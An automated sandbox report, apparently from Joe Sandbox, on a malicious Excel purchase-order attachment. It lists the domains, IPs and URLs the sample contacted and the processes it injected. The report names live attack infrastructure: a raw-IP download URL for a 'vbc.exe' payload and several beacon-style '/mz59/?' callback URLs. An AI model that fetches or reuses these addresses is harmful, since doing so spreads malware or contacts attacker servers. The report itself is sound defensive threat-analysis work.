          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/favicon.ico0%Avira URL Cloudsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.hostingbisniz.com/mz59/?rFN0=Xrx4qn&u2M0SF6h=OW9WwwQcQ8ztOX5YgXZ2qNcRwznn7rmsJyX42Vrsm3RiMqRsS0WcEJSAu/B+R53MEk5Vww==0%Avira URL Cloudsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://buscar.ozu.es/0%Avira URL Cloudsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://www.pellatrap.net/mz59/?u2M0SF6h=DyvGskzBclCbgEHOjTp+IehUzdGnZKMlyQnRi93amGKEFkS3cbEvMjPLMaYESsyOmM8Qkw==&rFN0=Xrx4qn0%Avira URL Cloudsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://www.ozu.es/favicon.ico0%Avira URL Cloudsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://www.tennessyherb.com/mz59/?u2M0SF6h=DnU1EkBat3Hivgbf1+4PHnhz+o7EzLkrjQo0TNQNOtieRb0aWO5zv8QtAyN+qW28k6DlMA==&rFN0=Xrx4qn0%Avira URL Cloudsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/0%Avira URL Cloudsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          propage.beatstars.com
          52.206.159.80
          truefalse
            high
            www.pellatrap.net
            74.208.236.61
            truetrue
              unknown
              cna-notary.com
              184.168.131.241
              truetrueunknown
              www.8no3.com
              156.235.143.6
              truetrueunknown
              hostingbisniz.com
              209.126.13.151
              truetrue
                unknown
                sbsfe-p11r.geo.mf0.yahoodns.net
                67.195.197.25
                truetrue
                  unknown
                  shops.myshopify.com
                  23.227.38.74
                  truetrue
                    unknown
                    xjcg168.com
                    102.141.201.70
                    truetrue
                      unknown
                      www.xjcg168.com
                      unknown
                      unknowntrue
                        unknown
                        www.thejakx.com
                        unknown
                        unknowntrue
                          unknown
                          www.bestpodstudio.com
                          unknown
                          unknowntrue
                            unknown
                            www.cna-notary.com
                            unknown
                            unknowntrue
                              unknown
                              www.macijanie.com
                              unknown
                              unknowntrue
                                unknown
                                www.vandelayind.net
                                unknown
                                unknowntrue
                                  unknown
                                  www.hostingbisniz.com
                                  unknown
                                  unknowntrue
                                    unknown
                                    www.tennessyherb.com
                                    unknown
                                    unknowntrue
                                      unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      http://192.227.129.22/vbc.exetrue
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://www.bestpodstudio.com/mz59/?rFN0=Xrx4qn&u2M0SF6h=z/+6kJk1ZiQzz1nPj4QpXoSyzw+77qJSyU9yqVlYEeNMvKLM5SL/kyHjrXfbl0j4G8KzAg==true
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.hostingbisniz.com/mz59/?rFN0=Xrx4qn&u2M0SF6h=OW9WwwQcQ8ztOX5YgXZ2qNcRwznn7rmsJyX42Vrsm3RiMqRsS0WcEJSAu/B+R53MEk5Vww==true
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.pellatrap.net/mz59/?u2M0SF6h=DyvGskzBclCbgEHOjTp+IehUzdGnZKMlyQnRi93amGKEFkS3cbEvMjPLMaYESsyOmM8Qkw==&rFN0=Xrx4qntrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.tennessyherb.com/mz59/?u2M0SF6h=DnU1EkBat3Hivgbf1+4PHnhz+o7EzLkrjQo0TNQNOtieRb0aWO5zv8QtAyN+qW28k6DlMA==&rFN0=Xrx4qntrue
                                      • Avira URL Cloud: safe
                                      unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http://search.chol.com/favicon.icoexplorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                        high
                                        http://www.mercadolivre.com.br/explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.merlin.com.pl/favicon.icoexplorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://search.ebay.de/explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                          high
                                          http://www.mtv.com/explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                            high
                                            http://www.rambler.ru/explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                              high
                                              http://www.nifty.com/favicon.icoexplorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                high
                                                http://www.dailymail.co.uk/explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                http://www3.fnac.com/favicon.icoexplorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  high
                                                  http://buscar.ya.com/explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                    high
                                                    http://search.yahoo.com/favicon.icoexplorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                      high
                                                      http://www.iis.fhg.de/audioPAexplorer.exe, 00000006.00000000.2149115180.0000000004B50000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.sogou.com/favicon.icoexplorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        high
                                                        http://asp.usatoday.com/explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          high
                                                          http://fr.search.yahoo.com/explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            high
                                                            http://rover.ebay.comexplorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              high
                                                              http://in.search.yahoo.com/explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                high
                                                                http://img.shopzilla.com/shopzilla/shopzilla.icoexplorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  high
                                                                  http://search.ebay.in/explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    high
                                                                    http://image.excite.co.jp/jp/favicon/lep.icoexplorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://%s.comexplorer.exe, 00000006.00000000.2160171245.000000000A330000.00000008.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    low
                                                                    http://msk.afisha.ru/explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      high
                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namevbc.exe, 00000004.00000002.2132538973.0000000002421000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        http://busca.igbusca.com.br//app/static/images/favicon.icoexplorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://search.rediff.com/explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          high
                                                                          http://www.windows.com/pctv.explorer.exe, 00000006.00000000.2140876935.0000000003C40000.00000002.00000001.sdmpfalse
                                                                            high
                                                                            http://www.ya.com/favicon.icoexplorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              high
                                                                              http://www.etmall.com.tw/favicon.icoexplorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://it.search.dada.net/favicon.icoexplorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://search.naver.com/explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                high
                                                                                http://www.google.ru/explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  high
                                                                                  http://search.hanafos.com/favicon.icoexplorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  http://cgi.search.biglobe.ne.jp/favicon.icoexplorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://coinmarketcap.com/api/vbc.exe, vbc.exe, 00000005.00000002.2171190369.0000000000F92000.00000020.00020000.sdmpfalse
                                                                                    high
                                                                                    http://www.abril.com.br/favicon.icoexplorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    http://search.daum.net/explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                      high
                                                                                      http://search.naver.com/favicon.icoexplorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                        high
                                                                                        http://search.msn.co.jp/results.aspx?q=explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        http://www.clarin.com/favicon.icoexplorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          high
                                                                                          http://buscar.ozu.es/explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          http://kr.search.yahoo.com/explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            high
                                                                                            http://search.about.com/explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                              high
                                                                                              http://busca.igbusca.com.br/explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityexplorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                high
                                                                                                http://www.ask.com/explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  high
                                                                                                  http://www.priceminister.com/favicon.icoexplorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    high
                                                                                                    http://www.cjmall.com/explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://search.centrum.cz/explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        high
                                                                                                        http://suche.t-online.de/explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          high
                                                                                                          http://www.google.it/explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://search.auction.co.kr/explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://www.ceneo.pl/explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                              high
                                                                                                              http://www.amazon.de/explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000006.00000000.2154967477.000000000856E000.00000004.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://sads.myspace.com/explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://busca.buscape.com.br/favicon.icoexplorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://www.pchome.com.tw/favicon.icoexplorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://browse.guardian.co.uk/favicon.icoexplorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://google.pchome.com.tw/explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://www.rambler.ru/favicon.icoexplorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://uk.search.yahoo.com/explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://espanol.search.yahoo.com/explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://www.ozu.es/favicon.icoexplorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            http://search.sify.com/explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://openimage.interpark.com/interpark.icoexplorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://search.yahoo.co.jp/favicon.icoexplorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://search.ebay.com/explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://www.gmarket.co.kr/explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  http://search.nifty.com/explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://searchresults.news.com.au/explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    http://www.google.si/explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://www.google.cz/explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://www.soso.com/explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://www.univision.com/explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://search.ebay.it/explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://www.asharqalawsat.com/explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                http://busca.orange.es/explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://auto.search.msn.com/response.asp?MT=explorer.exe, 00000006.00000000.2160171245.000000000A330000.00000008.00000001.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://search.yahoo.co.jpexplorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      unknown
                                                                                                                                                      http://www.target.com/explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://buscador.terra.es/explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        unknown
                                                                                                                                                        http://search.orange.co.uk/favicon.icoexplorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        unknown
                                                                                                                                                        http://www.iask.com/explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        unknown
                                                                                                                                                        http://www.tesco.com/explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://cgi.search.biglobe.ne.jp/explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          http://search.seznam.cz/favicon.icoexplorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://suche.freenet.de/favicon.icoexplorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://search.interpark.com/explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://search.ipop.co.kr/favicon.icoexplorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                unknown
                                                                                                                                                                http://investor.msn.com/explorer.exe, 00000006.00000000.2140876935.0000000003C40000.00000002.00000001.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://search.espn.go.com/explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://www.myspace.com/favicon.icoexplorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                                      high

                                                                                                                                                                      Contacted IPs

                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                                      Public

                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                      74.208.236.61
                                                                                                                                                                      unknownUnited States
                                                                                                                                                                      8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                                                                                                                      102.141.201.70
                                                                                                                                                                      unknownSeychelles
                                                                                                                                                                      328543sun-asnSCtrue
                                                                                                                                                                      67.195.197.25
                                                                                                                                                                      unknownUnited States
                                                                                                                                                                      26101YAHOO-3UStrue
                                                                                                                                                                      192.227.129.22
                                                                                                                                                                      unknownUnited States
                                                                                                                                                                      36352AS-COLOCROSSINGUStrue
                                                                                                                                                                      209.126.13.151
                                                                                                                                                                      unknownUnited States
                                                                                                                                                                      40021CONTABOUStrue
                                                                                                                                                                      23.227.38.74
                                                                                                                                                                      unknownCanada
                                                                                                                                                                      13335CLOUDFLARENETUStrue
                                                                                                                                                                      156.235.143.6
                                                                                                                                                                      unknownSeychelles
                                                                                                                                                                      134548DXTL-HKDXTLTseungKwanOServiceHKtrue
                                                                                                                                                                      184.168.131.241
                                                                                                                                                                      unknownUnited States
                                                                                                                                                                      26496AS-26496-GO-DADDY-COM-LLCUStrue

                                                                                                                                                                      General Information

                                                                                                                                                                      Joe Sandbox Version:31.0.0 Red Diamond
                                                                                                                                                                      Analysis ID:323358
                                                                                                                                                                      Start date:26.11.2020
                                                                                                                                                                      Start time:21:11:49
                                                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                                                      Overall analysis duration:0h 9m 54s
                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                      Report type:light
                                                                                                                                                                      Sample file name:EME_PO.47563.xlsx
                                                                                                                                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                                                      Number of analysed new started processes analysed:9
                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                      Number of injected processes analysed:1
                                                                                                                                                                      Technologies:
                                                                                                                                                                      • HCA enabled
                                                                                                                                                                      • EGA enabled
                                                                                                                                                                      • HDC enabled
                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                      Detection:MAL
                                                                                                                                                                      Classification:mal100.troj.spyw.expl.evad.winXLSX@9/6@13/8
                                                                                                                                                                      EGA Information:Failed
                                                                                                                                                                      HDC Information:
                                                                                                                                                                      • Successful, ratio: 36.5% (good quality ratio 34.6%)
                                                                                                                                                                      • Quality average: 74.2%
                                                                                                                                                                      • Quality standard deviation: 29.7%
                                                                                                                                                                      HCA Information:
                                                                                                                                                                      • Successful, ratio: 94%
                                                                                                                                                                      • Number of executed functions: 0
                                                                                                                                                                      • Number of non-executed functions: 0
                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                      • Adjust boot time
                                                                                                                                                                      • Enable AMSI
                                                                                                                                                                      • Found application associated with file extension: .xlsx
                                                                                                                                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                                      • Attach to Office via COM
                                                                                                                                                                      • Scroll down
                                                                                                                                                                      • Close Viewer
                                                                                                                                                                      Warnings:
                                                                                                                                                                      Show All
                                                                                                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                                                                                                                                                      • TCP Packets have been reduced to 100
                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                      • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                      • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                                                                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.

                                                                                                                                                                      Simulations

                                                                                                                                                                      Behavior and APIs

                                                                                                                                                                      TimeTypeDescription
                                                                                                                                                                      21:15:57API Interceptor51x Sleep call for process: EQNEDT32.EXE modified
                                                                                                                                                                      21:15:59API Interceptor72x Sleep call for process: vbc.exe modified
                                                                                                                                                                      21:16:20API Interceptor220x Sleep call for process: explorer.exe modified

                                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                                      IPs

                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                      67.195.197.257OKYiP6gHy.exeGet hashmaliciousBrowse
